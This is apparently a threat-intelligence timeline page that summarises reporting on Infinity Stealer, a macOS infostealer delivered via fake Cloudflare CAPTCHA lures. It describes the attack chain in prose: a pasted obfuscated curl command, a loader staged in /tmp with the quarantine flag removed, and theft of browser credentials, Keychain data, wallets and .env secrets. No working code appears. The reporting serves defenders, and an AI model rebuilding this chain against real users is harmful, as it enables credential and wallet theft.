CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Infinity Stealer macOS infostealer delivered via ClickFix CAPTCHA lures

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A new macOS-targeting infostealer named Infinity Stealer is being distributed via ClickFix CAPTCHA lures impersonating Cloudflare’s human verification, leading victims to execute a base64-obfuscated Bash command that fetches and runs a Nuitka-compiled Python payload. The attack abuses a fake CAPTCHA on update-check[.]com to bypass OS defenses and install a Mach-O loader that extracts a zstd-compressed archive containing the stealer. Infinity Stealer harvests browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets from developer files, and exfiltrates data via HTTP POST to C2 with Telegram notifications to operators.

Timeline

  1. 28.03.2026 16:35 1 articles · 2h ago

    Nuitka-compiled Infinity Stealer malware deployed via ClickFix CAPTCHA lures on macOS

    Malware distribution begins with a fake Cloudflare CAPTCHA on update-check[.]com that instructs users to paste a base64-obfuscated curl command into Terminal. The command fetches and executes a Nuitka-compiled Mach-O loader (8.6 MB) that unpacks a 35 MB zstd archive to deploy the Infinity Stealer payload (UpdateHelper.bin). The infostealer performs anti-analysis checks and then collects browser credentials, Keychain data, cryptocurrency wallets, and plaintext secrets from developer files before exfiltrating via HTTP POST to C2 and notifying operators via Telegram.

    Show sources
    Open in new tab

Information Snippets

  • Infinity Stealer is a Python-based macOS infostealer compiled with the open-source Nuitka compiler into a native Mach-O binary to evade static analysis.

    First reported: 28.03.2026 16:35
    1 source, 1 article
    Show sources

  • The initial access vector uses ClickFix CAPTCHA lures mimicking Cloudflare on update-check[.]com, prompting users to paste a base64-obfuscated curl command into Terminal.

    First reported: 28.03.2026 16:35
    1 source, 1 article
    Show sources

  • The pasted command decodes a Bash script that writes the stage-2 Nuitka loader to /tmp, removes the quarantine flag, and executes it via nohup, passing C2 and token via environment variables before self-deletion.

    First reported: 28.03.2026 16:35
    1 source, 1 article
    Show sources

  • The Nuitka loader is an 8.6 MB Mach-O binary containing a 35 MB zstd-compressed archive that extracts UpdateHelper.bin, the Infinity Stealer payload.

    First reported: 28.03.2026 16:35
    1 source, 1 article
    Show sources

  • Infinity Stealer performs anti-analysis checks for virtualization or sandboxing before proceeding to data collection.

    First reported: 28.03.2026 16:35
    1 source, 1 article
    Show sources

  • The stealer collects credentials from Chromium-based browsers and Firefox, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets in .env files.

    First reported: 28.03.2026 16:35
    1 source, 1 article
    Show sources

  • Stolen data is exfiltrated via HTTP POST requests to a C2 server, and a Telegram notification is sent to the operators upon completion of the operation.

    First reported: 28.03.2026 16:35
    1 source, 1 article
    Show sources